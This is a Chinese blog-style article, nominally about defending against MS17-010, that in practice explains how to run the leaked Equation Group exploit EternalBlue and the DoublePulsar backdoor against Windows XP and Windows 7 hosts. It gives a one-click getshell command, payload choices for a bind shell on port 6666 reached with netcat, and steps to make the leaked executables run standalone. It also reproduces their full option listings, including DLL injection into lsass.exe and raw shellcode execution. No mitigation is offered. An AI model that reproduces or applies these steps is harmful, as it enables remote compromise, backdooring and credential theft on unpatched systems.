频道栏目
首页 > 安全 > 网络安全 > 正文

方程式黑客攻击防范:MS17-010 Exploit

2017-04-21 09:57:01      个评论      
收藏   我要投稿

 方程式黑客攻击防范:MS17-010 Exploit。从方程式组织的工具包里面抠出来的。(好像就这个有用?)

测试了32位XP和64位Win7成功。

\

是的。如你所见,这个exp是一键getshell。也可以替换掉目录下的luan32.dll或者luan64.dll实现别的功能,默认是开启6666端口绑定shell,然后调用netcat去连接。

顺带记录下这里走的一些弯路。我是用msf来生成这两个dll的。一开始我是写的:

windows/shell/bind_tcp

结果发现死活连不上,后来仔细一看msf的介绍,原来要用另一个才能直接用netcat去连接。

windows/shell_bind_tcp

他们的区别就是前者比较小,只打开端口等msf连上去给他发送shellcode,所以用netcat是连不了的。下面这个shell_bind_tcp就可以直接用netcat链接。

最后再说下用法把:

在那个目录打开CMD:

ms17-010 192.168.2.200 WIN72K8R2 x64

第一个参数是IP

第二个参数是系统。2个选项:XP或者WIN72K8R2

第三个参数也是2个选项:x64或者x86

==================经过各种考虑决定不公开我修改后的exp

但是如果是这样,那么观众们都要打死我了。。

说下我的思路,懂的人自己就可以弄好这个小工具了。

把工具包里\lib\x86-Windows目录下的dll文件拷贝到\windows\specials目录下,

然后把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,

然后就可以在CMD下运行Eternalblue-2.2.0了。

C:\luan\ms17-010>Eternalblue-2.2.0.exe –help

Eternalblue 2.2.0

Usage: Eternalblue-2.2.0.exe

Options:

–NetworkTimeout S16 (default: 60)

Timeout for blocking network calls (in seconds). Use -1 for no timeout.

–TargetIp IPv4

Target IP Address

–TargetPort TcpPort (default: 445)

Port used by the SMB service for exploit connection

–VerifyTarget Boolean (default: true)

Validate the SMB string from target against the target selected before exp

loitation.

–VerifyBackdoor Boolean (default: true)

Validate the presence of the DOUBLE PULSAR backdoor before throwing. This

option must be enabled for multiple exploit attempts.

–MaxExploitAttempts U32 (default: 3)

Number of times to attempt the exploit and groom. Disabled for XP/2K3.

–GroomAllocations U32 (default: 12)

Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3

) to do.

[–LogFile String]

Where to write log file

–OutConfig String (default: stdout)

Where to write output parameters file

–ValidateOnly Boolean (default: false)

Stop execution after parameter validation

–Target Choice

Operating System, Service Pack, and Architecture of target OS

XP

Windows XP 32-Bit All Service Packs

WIN72K8R2

Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

C:\luan\ms17-010>

同理还有Doublepulsar-1.3.1.exe:

C:\luan\ms17-010>Doublepulsar-1.3.1.exe –help

Doublepulsar 1.3.1

Usage: Doublepulsar-1.3.1.exe

Options:

–NetworkTimeout S16 (default: 60)

Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

–TargetIp IPv4

Target IP Address

–TargetPort TcpPort (default: 445)

Port used by the Double Pulsar back door

[–LogFile String]

Where to write log file

–OutConfig String (default: stdout)

Where to write output parameters file

–ValidateOnly Boolean (default: false)

Stop execution after parameter validation

–Protocol Choice (default: SMB)

Protocol for the backdoor to speak

SMB

Ring 0 SMB (TCP 445) backdoor

RDP

Ring 0 RDP (TCP 3389) backdoor

–Architecture Choice (default: x86)

Architecture of the target OS

x86

x86 32-bits

x64

x64 64-bits

–Function Choice (default: OutputInstall)

Operation for backdoor to perform

OutputInstall

Only output the install shellcode to a binary file on disk.

–OutputFile String

Full path to the output file

Ping

Test for presence of backdoor

RunDLL

Use an APC to inject a DLL into a user mode process.

–DllPayload LocalFile

DLL to inject into user mode

–DllOrdinal U32 (default: 1)

The exported ordinal number of the DLL being injected to call

–ProcessName String (default: lsass.exe)

Name of process to inject into

–ProcessCommandLine String (default: )

Command line of process to inject into

RunShellcode

Run raw shellcode

–ShellcodeFile LocalFile

Full path to the file containing shellcode

–ShellcodeData LocalFile

Full path to the file containing shellcode to run

Uninstall

Remove’s backdoor from system

C:\luan\ms17-010>

\

上一篇:Ewind:披着合法应用外衣的广告软件
下一篇:深入分析NSA用了5年的IIS漏洞
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站